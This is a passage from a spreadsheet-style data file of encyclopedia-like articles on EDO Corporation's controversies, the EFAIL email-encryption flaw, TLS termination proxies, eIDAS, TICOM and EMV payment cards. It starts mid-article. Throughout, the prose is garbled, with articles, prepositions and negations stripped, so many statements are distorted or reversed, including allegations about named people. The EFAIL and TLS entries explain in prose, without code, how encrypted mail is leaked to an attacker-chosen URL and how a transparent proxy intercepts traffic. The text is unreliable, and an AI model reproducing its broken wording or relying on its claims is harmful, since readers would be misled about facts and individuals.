bankruptcy proceedings. charges laid letter u.s. state department president james smith. senior vice president condor systems, fredric bassett edo's senior vice president-finance, treasurer, chief financial officer. earmarks affair corporation made payments political action committee, political funds republican democratic party candidates, tended politicians important government military defence procurement committees. controversy arisen contributions, senators hillary clinton, charles schumer congressman steven israel, backed 'earmarked' government military contracts corporation, soon afterwards. december 2005, york reported that: many companies executives earmarks year donated money senator clinton, sits senate armed services committee, schumer, also israel. several designated earmarks gave members joint defense appropriations conference committee, wrote york projects defense spending bill.&lt; september 2006, york reported gained government defense contacts giving financial donations washington insiders. president james smith 2006 executive excess report august 2006, corporation chairman, ceo, president, james smith, named report produced institute policy studies united fair economy, entitled 'executive excess'. smith reported received highest percentage raises america, direct result 'war terror' since 2001. total compensation 2006 $1.8 million year, $893,200 2001. july 2006 smith filed u.s. securities exchange commission (sec) data showing sacked workers factory california management team failed secure lucrative contract anti-ied devices. september 2003 listed fortune magazine number fastest growing companies u.s. failed make recent years financial troubles. owned corporation. director dennis blair edo-ida scandal dennis blair 2006 director corp. also u.s. military commander associate director central intelligence agency military support. record knowledge covert operations within allied countries intended influence political affairs benefit interests.on july 2006, washington post published article pulitzer prize–winning journalist jeffrey smith renae merle. this detailed links think tank, institute defense analyses (ida) commissioned independent advisor pentagon, corporation. article exposed serious issues arising blair's joint positions president director corp. article based evidence gathered non-profit corruption watchdog, called project government oversight (pogo) published detailed report day, entitled "preying taxpayer: raptor." this report details evidence conflict interest corporation.the pogo report describes produced independent study pentagon, entitled f-22 multiyear procurement business case analysis, advised u.s. congress multiyear procurement (myp) lockheed martin f-22 raptor could result cost savings, requirements issuing multiyear procurement contract. report note, however, estimated cost savings less historical myps. congress approved myp, legislative amendment, proposed senator saxby chambliss (ga), partly basis report's findings. report time backed f-22 program extension, contrast previous reports advised separate study rand, however, commissioned wake ida-edo scandal, also estimated cost savings associated f-22 contract, actually larger estimated cost savings reported. chambliss amendment extended production life lockheed martin f-22 raptor three years, overturning previous decision phase fighter plane safety performance problems, well huge expense. testimony senate armed services airland subcommittee, july 2006, pogo's danielle brian said: know admiral blair recused himself, affected outcome report. would submit, however, appearance conflict interest given substantial personal financial interest fiduciary responsibility edo—in continued funding f-22a. this raises reasonable questions independence ida's analysis. important contractor program, sole supplier amraam vertical ejection launcher. director owned shares company, dennis blair arguably stood gain decision congress extend program. july 2006, washington post reported dennis blair revealed would resign board corporation, soon possible,' revelations. dennis blair submitted letter resignation july 2006. september 2006, washington post reported dennis blair resigned position president institute defense analyses trustees found conflict interest occurred. blair asked give paid positions military contractors, refused instead chose give position president ida.on september 2006, rolling stone magazine published article story entitled "another tale waste fraud unpunished".on september 2006, york times reported f-22 multiyear contract approved congress despite opposition donald rumsfeld, george bush present future chairmen u.s. government military procurement committees. york times suggested military industrial lobby pushed f-22 multiyear programme powerful elected officials oversee government military spending including president united states himself.on december 2006, washington post reported u.s. inspector general found although blair indeed violated ida's conflict interest policy working time, actions affected ida's results f-22. also found blair's involvement f-22 study "minimal," involvement conducting analysis preparing reviewing report finalized.dennis blair replaced director general john gordon (ret), closely linked blair. 1996 gordon replaced blair associate director military affairs cia, 2007 blair gordon together council safe, corporate-military think tank tasked finding solutions approaching energy crisis.in january 2009 blair became director national intelligence president barack obama making highest ranking intelligence official government. resigned position 2010. director leslie kenne joint strike fighter contract lieutenant general leslie kenne spent years united states force. 1997 appointed director joint strike fighter (jsf) program, u.s. department defense's largest ever military acquisition program budget billion. lockheed martin prime program contractor. lockheed martin awarded contract january 2002 design, development manufacture suite pneumatic weapon delivery systems jsf. kenne resigned usaf september 2003 shortly afterwards joined board directors corporation. director paul kern allegations crimes ghraib/edo links titan corporation while still serving u.s. military general paul kern appointed defense secretary donald rumsfeld report internal investigation ghraib torture prisoner abuse. august 2004 presented report largely absolving military hierarchy blame torture sexual abuse. kern blamed torture part civilian contractors working military intelligence services prison. companies involved identified titan corporation, contractor supplies technology 'civilian interrogators' military intelligence. (the company close links intelligence community. former director james woolsey served board directors.) however kern advise titan corporation charged criminal offence. kern picked rumsfeld investigate military intelligence operations ghraib earlier report implicated torture. this earlier report called taguba report controversial reference 'systematic abuse' kept secret leaked seymour hersh yorker. june 2007 hersh published article taguba forced resign submitting report rumsfeld. enlisted u.s. soldiers eventually convicted, imprisoned result investigations. titan corporation sacked employees adel nakhla admitted holding prisoners tortured. another titan employee john israel, 'civilian interrogator/interpreter' identified taguba report four main people believed responsible torture suspected journalists including robert fisk israeli agent.in april 2008 bush administration ordered release memo freedom information showed approved torture techniques 2003 given legal argument support torture techniques.kern retired shortly report came january 2005 joined corporation director. corporation directors helped elect him, james roth robert hanisee, were, remain directors titan corporation directors open charges collusion direct involvement crimes according international law, prosecuted united states legal system. despite lack political government prosecute, titan corporation caci nonetheless defendants civil action brought victims torture ghraib prison.the u.s. military commissions 2006 effectively brought legal actions 2005, titan corp. admitted bribery charges paid million re-election fund president benin, mathieu kérékou.kern also member cohen group another corp director, robert tyrer. protest regular anti-war protests outside (uk) factory september 2006, protesters blockaded factory brighton several hours forcing managing director paul hills scale security fence enter premises. used angle grinder wire cutters hole edo's fence employees work. protesters left scene without arrested. september 2006, protesters marched brighton deliver petition calling closure brighton town hall. august 2006 protesters climbed feet onto roof technology unfurl banner protesting company's supply weapons israel used qana bombing lebanese children killed. july 2006 protesters staged 'horrors war' demonstration outside brighton factory recreating scenes violence mutilation result aerial bombardment. morning july 2006, three activists completely blockaded edo's brighton, united kingdom subsidiary technology protest edo's supply weapons technology israeli military used attack gaza ongoing 2006 israel-lebanon conflict. these actions ongoing campaign protest, civil disobedience non-violent direct action brighton began 2004 come known smash campaign. smash campaign there numerous protests direct actions since 2004 voicing opinion close convert factory civilian use. january 2009, gaza war, activists raided edo's factory moulsecombe destroyed equipment. 2010, jury found activists, invoked lawful excuse defence, according lawful commit offence prevent serious crime, guilty conspiring cause criminal damage factory. jonathan hoffman, vice-chair zionist federation great britain ireland, claimed judge "behaved like defence counsel neutral officer court supposed role judge advancing political agenda clarify points members jury..." zero retention force arming unit zero retention force arming unit (zrfau) military electro mechanical device. technology sole owners proprietary rights unit technical support design authority ongoing installation. units used u.s. navy bru-32, bru-41, bru-42, bru-45, force bru-46 bru-47, royal australian force mau-12, european tornado hmeru lmeru bomb racks. zrfau also used israeli military industries (imi) ver-2 bomb rack, bomb rack also owned technology ltd, currently advertised sale subsidiary elbit systems israel, israeli ministry defense israeli force f-16. following investigations campaigners mbm's links israel, submission documents showing links court part defence palestine solidarity protesters, removed website reference stating 'actively manufacturing' zrfaus, claiming statement error'. directors edo(uk)ltd, parent company admitted subsidiary, artisan technologies, jersey, manufacture component supplied israel. this subsidiary owned 2000 sold 2008. despite sale company officially manufacturing zrfau, continue sole point contact sales technical support component 2000 present day. november 2009 information tribunal looking mbm's export licence applications held dept business (bis) found "there dispute eru151 zrfau components incorporated ver-2 bomb racks f-16 combat aircraft, aircraft used israeli force, 1998 owned right manufacture eru151 zrfau.'" "after examining documents, concluded information confirm claims supplied israel, therefore documents remain confidential. established mbm's involvement design, development, technical support supply zrfau taking place without apparent export controls, apparent breach legislation. june 2010 decommissioners case jury twelve members public acquitted seven people conspiracy cause £180,000 criminal damage factory, grounds belief supplying israel zrfau time operation cast lead extension belief complicit crimes carried israel people gaza reasonable belief. followed also reasonable damage factory tune £180,000 order small stop israeli crimes protect palestinian property. even paul hills, director mbm, accepted trial activists belief 'not unreasonable,' light documents appeared establish fact, although previous sworn testimony five years, continued deny involvement. ver-2 ver- means vertical ejector rack (for) (bombs), designed produced f-16 f-18. 1990s lucas western corporation helped israel military industries design rack israeli f-16s. janes defence weekly (jdw) article, june 1996, stated "israel's f16s ver-2 vertical ejection bomb racks made israeli military industries (imi)" later sold business elbit.in 2005 managing director admitted company acquired rights ver-2 lucas western 1998 since 'jointly marketing third party country'. stated oath removed references ver-2 website, protests began brighton 2004, avoid controversy [42] 2009 managing director paul hills told argus: would stood court sworn oath supply israel, things smash accuse of." peace messenger city brighton hove originally targeted protesters represents direct link iraq occupation palestine city brighton hove. city council first country awarded united nations peace messenger city status owns land, home farm business park, mbm's factory stands. rent property third party company, europa holdings ltd, hold 125-year lease section park factory. till early 2005 lease held cheshire county council. provided essential arming release components raytheon paveway 'smart munitions' used extensively shock bombing us/uk forces outset iraq war. this deaths tens thousands civilians. awarded contract provide components next generation paveway 'fire forget' smart bomb raf. result apparent contradiction peace messenger city landlord arms company, brighton city council july 2005 came close passing motion censure mbm. full council meeting, debate motion refused grounds time limits, council eventually passed watered amendment motion struck mention company instead resolved raise peace flag town hall year. march 2007, shortly green party councillor taken role 'peace messenger' member ruling labour party group, brighton council announced scrapping peace messenger city status financial reasons. injunction case: campaign smash others/edo axworthy others ongoing protests employees, april 2005, seek permanent high court injunction named protesters protest groups smash bombs brighton, grounds harassment. intended injunction brought section protection harassment 1997, applied protesters, named court papers (who case strongly denied allegations). case created controversy seen unjustified measure used u.s. arms company suppress freedom protest anti-war protesters. others, however, suggested court action used order prevent harassment violent crime. company failed gain permanent injunction dropped action early 2006, cost several million dollars legal costs. allegations sussex police collusion course high court battle temporary interim injunction imposed protesters full trial could deal full facts case. restrictions protests aggressive strategy sussex police brought injunction, dozens arrests public order criminal charges protesters. protesters spent week lewes prison remand) result arrests alleged breaches injunction. first using video camera gather evidence assault protester security guard, second stepping road opposite factory. these charges carried penalty five years prison conviction. cases would crown court jury trials dropped cps. others arrested allegations disobeyed police orders, assaulted police, obstructed enforcement injunction. after evidence came light high court sussex police colluded corporation exaggerate threat posed demonstrators safety employees, defence solicitors related criminal cases began investigate further. then appeared domino effect, crown prosecution service proceeded drop criminal charges, protesters, related cases, effort protect confidentiality internal sussex police documents helped defendants prove collusion taken place. july 2006 official complaints sussex police filed protesters alleging police collusion arms company. (uk) chairman robert walmsley questioned robert walmsley director corporation, chairman board (uk), includes technology brighton. august 2004 independent reported robert walmsley, former chief procurement ministry defence, retired april 2003, called government watchdog, advisory committee business appointments, answer questions appointments board directors general dynamics corporation.general dynamics awarded (£1.7 billion) prime contractor systems integration contract bowman secure, digital voice data communications system september 2001, walmsley still charge procurement. retirement april 2003 warmsley offered lucrative directorship general dynamics. government watchdog committee advised walmsley take post year retired mod, avoid appearance 'reward' given general dynamics walmsley. walmsley publicly joined general dynamics april 2004. then, already become non-executive director board british energy. independent report, prime minister tony blair said dismissed watchdog recommendations tighter rules needed issues. later report published independent december 2004, blair alleged helped 'mandarins' walmsley, gain jobs private sector, defiance anti-corruption committees. 2006, independent reported government plans scrap anti-corruption watchdog committees. robert walmsley global dominance group 2006 robert walmsley named report 'the global dominance group' produced research group project censored. walmsley cited people considered world's advocates neo-conservative global military domination. robert walmsley yamamah arms scandal robert walmsley also linked controversy yamamah arms deal saudi arabia conducted secrecy government national audit office reports deal remain classified. deal associated bribery corruption allegations, subject police investigation dropped controversial circumstances. police denied access report classified. daily telegraph report july 2006 reported, judging list documents released freedom information (foia), classified reports rather previously thought. revelation came title documents: "letter robert walmsley, chief defence procurement c&amp;ag [nao head john bourn] responding recommendations draft audit findings march 1998" apparently refers draft second secret report. references external links parent company, harris corporation site</t>
  </si>
  <si>
    <t>EFAIL</t>
  </si>
  <si>
    <t>efail, also written efail, security hole email systems content transmitted encrypted form. this allows attackers access decrypted content email contains active content like html javascript, loading external content enabled client. affected email clients include gmail, apple mail, microsoft outlook.two related common vulnerabilities exposures ids, cve-2017-17688 cve-2017-17689, issued. security made public 2018 damian poddebniak, christian dresen, jens müller, fabian ising, sebastian schinzel, simon friedberger, juraj somorovsky jörg schwenk part contribution 27th usenix security symposium, baltimore, august 2018. result vulnerability, content attacked encrypted email transmitted attacker plain text vulnerable email client. used encryption keys disclosed. description security concerns many common email programs used email encryption systems openpgp s/mime. attacker needs access attacked email message encrypted form, well ability send email least regular recipient original email. exploit security gap, attacker modifies encrypted email, causing recipient's email program send decrypted content email attacker. access decrypted content encrypted email, attacker modifies email attacked contain text prepared attacker specific way. attacker sends changed email regular recipients. attacker inserts additional text encrypted text encrypted email, thereby changing message multipart/mixed (mime) message created encrypted part message appears together limit marks mime message parameter value html tag. example modified s/mime mail: email client first breaks multipart message individual parts using --boundary decrypts encrypted parts. reassembles multipart message, receives message way: this message contains decrypted content email src= attribute &lt;img&gt; passed email program server attacker.chosen.url controlled attacker, content requested. attacker retrieve content encrypted message server logs. variant attack, attacker uses vulnerability (s/mime) (openpgp) operating modes encryption algorithms used. this allows change ciphertext inserting gadgets. side effect manipulation, originally contained plain text becomes illegible. known, attacker correct inserting additional gadgets. attacker hide unknown plain text inserting certain html tags. result message similar structure described above. mitigations since vulnerability directed content email recipient, necessary recipients implement countermeasures. these include: disable active content html javascript viewing emails. suppress automatic reloading external content, images.to extent even senders encrypted content reduce vulnerability, e.g. electronic signatures limitation subset mime formats, conclusively clarified. critique announcing security vulnerability 2018 electronic frontier foundation (eff) recommended stop using plugins email programs even though vulnerability directly relate configuration email program. coordinated publication originally scheduled may. criticized ignoring various parties.as consequence this, robert hansen recommended establish closed group mailing list better coordinate publication future security issues. still, director danny o'brien best entity administer "openpgp disclosure group". references further reading poddebniak, damian; dresen, christian; müller, jens; ising, fabian; schinzel, sebastian; friedberger, simon; somorovsky, juraj; schwenk, jörg. "efail: breaking s/mime openpgp email encryption using exfiltration channels" (pdf). efail.de. draft 0.9.1. archived (pdf) original 2018-05-21. retrieved 2018-05-14. external links official web-site</t>
  </si>
  <si>
    <t>TLS termination proxy</t>
  </si>
  <si>
    <t>termination proxy termination proxy, offloading) proxy server acts intermediary point client server applications, used terminate and/or establish dtls) tunnels decrypting and/or encrypting communications. this different pass-through proxies forward encrypted (d)tls traffic clients servers without terminating tunnel. uses termination proxies used secure plaintext communications untrusted networks tunnelling (d)tls, allow inspection encrypted traffic intrusion detection system detect block malicious activities, allow network surveillance analysis encrypted traffic, enable otherwise unsupported integration applications provide additional capabilities content filtering hardware security module, enable (d)tls protocol versions, extensions, capabilities (e.g. ocsp stapling, alpn, dane, validation, etc.) unsupported client server applications enhance compatibility and/or security, work around buggy/insecure (d)tls implementations client server applications improve compatibility and/or security, provide additional certificate-based authentication unsupported server and/or client applications protocols, provide additional defence-in-depth layer centralised control consistent management (d)tls configuration associated security policies, reduce load main servers offloading cryptographic processing another machine. types termination proxies provide three connectivity patterns: offloading inbound encrypted (d)tls connection client forwarding communications plain text connection server. encryption inbound plaintext connection client forwarding communications encrypted (d)tls connection server. bridging encrypted (d)tls connections allow inspection filtering encrypted traffic decrypting inbound (d)tls connection client re-encrypting another (d)tls connection server.combining encrypting proxy front client offloading proxy front server, allow (d)tls encryption authentication protocols applications otherwise support proxies maintaining secure (d)tls tunnel untrusted network segments client server. proxy used clients intermediary gateway outbound connections typically called forward proxy, proxy used servers intermediary gateway inbound connections typically called reverse proxy. forward bridging proxies allow intrusion detection system analyse client traffic typically marketed "ssl forward proxy".tls offloading bridging proxies typically need authenticate clients digital certificate using either pkix dane authentication. usually server operator supplies reverse proxy valid certificate (d)tls handshake clients. forward proxy operator, however would need create private install trust store clients proxy generate certificate signed private real time server client tries connect when network traffic client server routed proxy, operate transparent mode using client's address instead connecting server using server's address responding client. transparent bridging proxy valid server certificate, neither client server would able detect proxy presence. adversary compromised private server's digital certificate able compromised/coerced pkix issue valid certificate server, could perform man-in-the-middle attack routing traffic client server transparent bridging proxy would ability copy decrypted communications, including logon credentials, modify content communications without detected. references</t>
  </si>
  <si>
    <t>EIDAS</t>
  </si>
  <si>
    <t>eidas (electronic identification, authentication trust services) regulation electronic identification trust services electronic transactions european single market. established regulation 910/2014 july 2014 electronic identification repeals 1999/93/ec december 1999.it entered force september 2014 applies july 2016 except certain articles, listed article organizations delivering public digital services member state must recognize electronic identification member states september 2018. description eidas oversees electronic identification trust services electronic transactions european union's internal market. regulates electronic signatures, electronic transactions, involved bodies, embedding processes provide safe users conduct business online like electronic funds transfer transactions public services. both signatory recipient convenience security. instead relying traditional methods, mail facsimile, appearing person submit paper-based documents, perform transactions across borders, like "1-click" technology.eidas created standards electronic signatures, qualified digital certificates, electronic seals, timestamps, proof authentication mechanisms enable electronic transactions, legal standing transactions performed paper.the regulation came effect july 2015, means facilitate secure seamless electronic transactions within european union. member states required recognise electronic signatures meet standards eidas. vision eidas result european commission's focus europe's digital agenda. with commission's oversight, eidas implemented spur digital growth within eu.the intent eidas drive innovation. adhering guidelines technology eidas, organisations pushed towards using higher levels information security innovation. additionally, eidas focuses following: interoperability: member states required create common framework recognize eids member states ensure authenticity security. that makes easy users conduct business across borders. transparency: eidas provides clear accessible list trusted services used within centralised signing framework. that allows security stakeholders ability engage dialogue best technologies tools securing digital signatures. regulated aspects electronic transactions regulation provides regulatory environment following important aspects related electronic transactions: digital identity: european-wide framework digital authentication citizens, legal validity. nine principles digital identity defined: user choice, privacy, interoperability security, trust, convenience, user consent control proportionality, counterpart knowledge global scalability. advanced electronic signature: electronic signature considered advanced meets certain requirements: provides unique identifying information links signatory. signatory sole control data used create electronic signature. must capable identifying data accompanying message tampered signed. signed data changed, signature marked invalid. there certificate electronic signature, electronic proof confirms identity signatory links electronic signature validation data person. advanced electronic signatures technically implemented, following xades, pades, cades asic baseline profile (associated signature containers) standard digital signatures, specified etsi. qualified electronic signature, advanced electronic signature created qualified electronic signature creation device based qualified certificate electronic signatures. qualified digital certificate electronic signature, certificate attests qualified electronic signature's authenticity issued qualified trust service provider. qualified website authentication certificate, qualified digital certificate trust services defined eidas regulation. trust service, electronic service creates, validates, verifies electronic signatures, time stamps, seals, certificates. also, trust service provide website authentication preservation created electronic signatures, certificates, seals. handled trust service provider. evolution legal implications eidas regulation evolved directive 1999/93/ec, goal member states expected achieve regards electronic signing. smaller european countries among first start adopting digital signatures identification, example first estonian digital signature given 2002 first latvian digital signature given 2006. their experience used develop eu-wide regulation, became binding throughout since first july, 2016. directive 1999/93/ec made member states responsible creating laws would allow meet goal creating electronic signing system within directive also allowed member state interpret impose restrictions, thus preventing real interoperability, leading toward fragmented scenario. contrast 1999 directive, eidas ensures mutual recognition authentication among member states, thus achieving goal digital single market. eidas provides tiered approach legal value. requires electronic signature denied legal effect admissibility court solely advanced qualified electronic signature. qualified electronic signatures must given legal effect handwritten signatures.for electronic seals (legal entities' version signatures), probative value explicitly addressed, seals enjoy presumption integrity correctness origin attached data.in june 2021, commission proposed amendment published recommendation. identity number database information linked kind identity number. certify person right access personal information involves several steps. connecting person number, done methods developed country, digital certificates. connecting number specific information, done databases. eidas needed connect number used country information, number used country issuing digital certificates.eidas minimum identity concept, name birth date. order access sensitive information, kind certification needed identity numbers issued countries refer person. vulnerabilities october, 2019, security flaws eidas-node sample implementation eidas profile provided european commission) discovered security researchers; vulnerabilities patched version 2.3.1 eidas-node. european self-sovereign identity framework european union started creating eidas compatible european self-sovereign identity framework (essif). also pades multi-factor authentication references external links "regulation (eu) 910/2014 european parliament council july 2014 electronic identification trust services electronic transactions internal market repealing directive 1999/93/ec". text eidas regulation.</t>
  </si>
  <si>
    <t>TICOM</t>
  </si>
  <si>
    <t>ticom (target intelligence committee) secret allied project formed world find seize german intelligence assets, particularly field cryptology signals intelligence.it operated alongside western allied efforts extract german scientific technological information personnel war, including operation paperclip (for rocketry), operation alsos (for nuclear information) operation surgeon (for avionics). competition soviet union spoils intense, direct payoffs including missile technology heightened cold stalemate landing moon. history project initiated british, army chief staff general george marshall learnt soon became anglo-american. seek capture cryptologic secrets germany. concept teams cryptologic experts, mainly drawn code-breaking center bletchley park, enter germany front-line troops capture documents, technology personnel various german signal intelligence organizations precious secrets could destroyed, looted, captured soviets. there teams. team tasked capture german geheimschreiber (secret writer) machines whose enciphered traffic code named fish team assist team transporting field marshal kesselring's communications train britain (the so-called "jellyfish convoy") team investigate intact german signals intelligence unit called "pers team investigate detail places southern germany team search passed quickly team following serendipitous discovery waterproof containing archives cipher department high command wehrmacht (okw/chi) lake schliersee, team tasked recovering anything else value lake team aimed capture exploit material german naval intelligence center german sigint headquarters okw/chi (high command) allied supposition supreme command german armed forces, oberkommando wehrmacht chiffrierabteilung (abbreviated okw/chi) german equivalent bletchley park, found incorrect. despite sigint agency german military, policy co-ordinate direct signal intelligence work different services. concentrated instead employing best cryptanalysts design germany's secure communications systems, assist individual services organisations. these were: army (heer) okh/gdna, oberkommando ders heeres/general nachrichten autklaerung force (luftwaffe) stelle navy (kriegsmarine) beobachtungsdienst b-dienst foreign office pers nazi party forschungsamt fadrs huttenhain fricke okw/chi requested write methods solution german machines. this covered un-steckered enigma, steckered enigmas; hagelin b-36 bc-38; cipher teleprinters siemens halske a/b, t52/c; siemens t43; lorenz sz42 a/b. they assumed kerckhoffs's principle machines worked would known, addressed solving keys, breaking machines first place. this showed that, least amongst cryptographers, un-steckered enigma clearly recognized solvable. enigmas plugboard (steckerbrett) considered secure used according instructions, less secure stereotyped beginnings routine phrases used, period described "faulty indicator technique" used 1940. opinion, however, steckered enigma never solved. discovery discovery 1945 nazi party's secret signals intelligence cryptanalytic agency kaufbeuren base southern bavaria came total surprise. province luftwaffe chief hermann göring, described "the richest, secret, nazi, influential" german cryptanalytic intelligence agencies. russian "fish" discovery greatest success ticom capture "russian fish", german wide-band receivers used intercept soviet high-level radio teletype signals. 1945, party ticom team received german knowledge certain signals intelligence equipment documentation relating russian traffic. after identifying remaining members unit, taken back previous base rosenheim. prisoners recovered tons equipment. machines re-assembled demonstrated. ticom officer paul whitaker later reported. "they intercepting russian traffic right there…pretty soon shown needed see." related efforts operation stella polaris finnish signals intelligence unit evacuated sweden following finland/soviet cease-fire september 1944. records, including cryptographic material, ended hands americans. also ralph tester, senior british codebreaker worked ticom project notes external links ticom archive references bamford, james (2002), body secrets: america's britain's gchq eavesdrop world (new ed.), london: arrow, isbn 978-0099427742 (includes material ticom take) huttenhain, orr; fricke (1945), okw/chi cryptanalytic research enigma, hagelin cipher teleprinter messages, ticom kahn, david (2000), hitler's spies: german military intelligence world cambridge, capo press, isbn 978-0306809491 parrish, thomas (1986), ultra americans: u.s. role breaking nazi codes, york: stein day, isbn 978-0-8128-3072-9 rezabek, randy (2012), "ticom: last great secret world ii", intelligence national security, (4): 513–530, doi:10.1080/02684527.2012.688305 rezabek, randy (2017), ticom: hunt hitler's codebreakers, independently published, isbn 978-1521969021</t>
  </si>
  <si>
    <t>EMV</t>
  </si>
  <si>
    <t>payment method based technical standard smart payment cards payment terminals automated teller machines accept them. stands "europay, mastercard, visa", three companies created standard.emv cards smart cards, also called chip cards, integrated circuit cards, cards, store data integrated circuit chips, addition magnetic stripes backward compatibility. these include cards must physically inserted "dipped" reader, well contactless cards read short distance using near-field communication technology. payment cards comply standard often called chip chip signature cards, depending authentication methods employed card issuer, personal identification number (pin) digital signature. standards exist, based iso/iec 7816, contact cards, based iso/iec 14443 contactless cards (mastercard contactless, visa paywave, american express expresspay). history until introduction chip pin, face-to-face credit debit card transactions involved magnetic stripe mechanical imprint read record account data, signature purposes identity verification. customer hands card cashier point sale passes card magnetic reader makes imprint raised text card. former case, system verifies account details prints slip customer sign. case mechanical imprint, transaction details filled list stolen numbers consulted, customer signs imprinted slip. cases cashier must verify customer's signature matches back card authenticate transaction. using signature card verification method number security flaws, obvious relative ease cards missing legitimate owners sign them. another involves erasure replacement legitimate signature, another involves forgery correct signature. invention silicon integrated circuit chip 1959 idea incorporating onto plastic smart card late 1960s german engineers, helmut gröttrup jürgen dethloff. earliest smart cards introduced calling cards 1970s, later adapted payment cards. smart cards since used integrated circuit chips, along memory technologies flash memory eeprom (electrically erasable programmable read-only memory).the first standard smart payment cards carte bancaire b0m4 bull-cp8 deployed france 1986, followed b4b0' (compatible deployed 1989. geldkarte germany also predates emv. designed allow cards terminals backwardly compatible standards. france since migrated card terminal infrastructure emv. stands europay, mastercard, visa, three companies created standard. standard managed emvco, consortium control split equally among visa, mastercard, jcb, american express, china unionpay, discover. emvco also refers "associates," companies able provide input receive feedback detailed technical operational issues connected specifications related processes.jcb joined consortium february 2009, china unionpay 2013, discover september 2013. differences benefits there major benefits moving smart-card-based credit card payment systems: improved security (with associated fraud reduction), possibility finer control "offline" credit-card transaction approvals. original goals provide multiple applications card: credit debit card application e-purse. issue debit cards contain applications card association (visa, mastercard etc.) application, common debit application. common debit application somewhat misnomer "common" debit application actually uses resident card association application.emv chip card transactions improve security fraud compared magnetic stripe card transactions rely holder's signature visual inspection card check features hologram. cryptographic algorithms triple des, provide authentication card processing terminal card issuer's host system. processing time comparable online transactions, communications delay accounts majority time, cryptographic operations terminal take comparatively little time. supposed increased protection fraud allowed banks credit card issuers push "liability shift", merchants liable january 2005 region october 2015 fraud results transactions systems emv-capable. majority implementations cards terminals confirm identity cardholder requiring entry personal identification number (pin) rather signing paper receipt. whether authentication takes place depends upon capabilities terminal programming card. when credit cards first introduced, merchants used mechanical rather magnetic portable card imprinters required carbon paper make imprint. they communicate electronically card issuer, card never left customer's sight. merchant verify transactions certain currency limit telephoning card issuer. during 1970s united states, many merchants subscribed regularly-updated list stolen otherwise invalid credit card numbers. this list commonly printed booklet form newsprint, numerical order, much like slender phone book, without data aside list invalid numbers. checkout cashiers expected thumb booklet every time credit card presented payment amount, prior approving transaction, incurred short delay.later, equipment electronically contacted card issuer, using information magnetic stripe verify card authorize transaction. this much faster before, required transaction occur fixed location. consequently, transaction take place near terminal restaurant, example) clerk waiter take card away customer card machine. easily possible time dishonest employee swipe card surreptitiously cheap machine instantly recorded information card stripe; fact, even terminal, thief could bend front customer swipe card hidden reader. this made illegal cloning cards relatively easy, common occurrence before.since introduction payment card chip pin, cloning chip feasible; magnetic stripe copied, copied card cannot used terminal requiring pin. introduction chip coincided wireless data transmission technology becoming inexpensive widespread. addition mobile-phone-based magnetic readers, merchant personnel bring wireless pads customer, card never cardholder's sight. thus, chip-and-pin wireless technologies used reduce risks unauthorized swiping card cloning. chip vis-à-vis chip signature chip verification methods enabled cards employ. rather physically signing receipt identification purposes, user enters personal identification number (pin), typically four digits length. this number must correspond information stored chip. chip technology makes much harder fraudsters found card, inasmuch someone steals card, unable make fraudulent purchases unless know pin. chip signature, hand, differentiates chip verifying consumer's identity signature.as 2015, chip signature cards common mexico, parts south america (such argentina, colombia, peru) asian countries (such taiwan, hong kong, thailand, south korea, singapore, indonesia), whereas chip cards common european countries (e.g., ireland, france, portugal, finland netherlands) well iran, brazil, venezuela, india, lanka, canada, australia zealand. online, phone, mail order transactions while technology helped reduce crime point sale, fraudulent transactions shifted vulnerable telephone, internet, mail order transactions—known industry card-not-present transactions. transactions made least credit card fraud. because physical distance, possible merchant present keypad customer cases, alternatives devised, including software approaches online transactions involve interaction card-issuing bank network's website, verified visa mastercard securecode (implementations visa's secure protocol). secure replaced strong customer authentication defined european second payment services directive. creating one-time virtual card linked physical card given maximum amount. additional hardware keypad screen produce one-time password, chip authentication program. keypad screen integrated complex cards produce one-time password. since 2008, visa running pilot projects using emue card generated number replaces code printed back standard cards.as faster, york times explained matter perception: while chip method requires chip stay machine transaction authorization process completed, phone swipe method authorization background; receipt starts coming right away. commands iso/iec 7816-3 defines transmission protocol chip cards readers. using protocol, data exchanged application protocol data units (apdus). this comprises sending command card, card processing sending response. uses following commands: application block application unblock card block external authenticate (7816-4) generate application cryptogram data (7816-4) processing options internal authenticate (7816-4) change unblock read record (7816-4) select (7816-4) verify (7816-4).commands followed "7816-4" defined iso/iec 7816-4 interindustry commands used many chip card applications cards. transaction flow transaction following steps: application selection initiate application processing read application data processing restrictions offline data authentication certificates cardholder verification terminal risk management terminal action analysis first card action analysis online transaction authorization (only carried required result previous steps; mandatory atms) second card action analysis issuer script processing. application selection iso/iec 7816 defines process application selection. intent application selection cards contain completely different applications—for example emv. however, developers implemented application selection identifying type product, product issuers (visa, mastercard, etc.) must application. application selection prescribed frequent source interoperability problems cards terminals. book standard devotes pages describing application selection process. application identifier (aid) used address application card host card emulation (hce) delivered without card. consists registered application provider identifier (rid) five bytes, issued iso/iec 7816-5 registration authority. this followed proprietary application identifier extension (pix), enables application provider differentiate among different applications offered. printed cardholder receipts. card issuers alter application name name card network. chase, example, renames visa application visa cards "chase visa", mastercard application mastercard cards "chase mastercard". capital renames mastercard application mastercard cards "capital one", visa application visa cards "capital visa". applications otherwise same.list applications: initiate application processing terminal sends processing options command card. when issuing command, terminal supplies card data elements requested card processing options data objects list (pdol). pdol list tags lengths data elements) optionally provided card terminal application selection. card responds application interchange profile (aip), list functions perform processing transaction. card also provides application file locator (afl), list files records terminal needs read card. read application data smart cards store data files. contains files contain data. these must read using read record command. specify files data stored files must read. data files stored format. defines values data used card processing. processing restrictions purpose processing restrictions card used. three data elements read previous step checked: application version number, application usage control (this shows whether card domestic use, etc.), application effective/expiration dates checking.if checks fails, card necessarily declined. terminal sets appropriate terminal verification results (tvr), components form basis accept/decline decision later transaction flow. this feature lets, example, card issuers permit cardholders keep using expired cards expiry date, transactions expired card performed on-line. offline data authentication (oda) offline data authentication cryptographic check validate card using public-key cryptography. there three different processes undertaken depending card: static data authentication (sda) ensures data read card signed card issuer. this prevents modification data, prevent cloning. dynamic data authentication (dda) provides protection modification data cloning. combined dda/generate application cryptogram (cda) combines generation card's application cryptogram assure card validity. support devices needed, process implemented specific markets. this process mandatory terminals carried card terminal support certificates verify authenticity payment cards, certificates used. certificate authority issues digital certificates payment card issuers. when requested, payment card chip provides card issuer's public certificate ssad terminal. terminal retrieves ca's public local storage uses confirm trust and, trusted, verify card issuer's public signed card issuer's public valid, terminal uses card issuer's public verify card's ssad signed card issuer. cardholder verification cardholder verification used evaluate whether person presenting card legitimate cardholder. there many cardholder verification methods (cvms) supported emv. they signature offline plaintext offline enciphered offline plaintext signature offline enciphered signature online required consumer device fail processingthe terminal uses list read card determine type verification perform. list establishes priority cvms relative capabilities terminal. different terminals support different cvms. atms generally support online pin. terminals vary 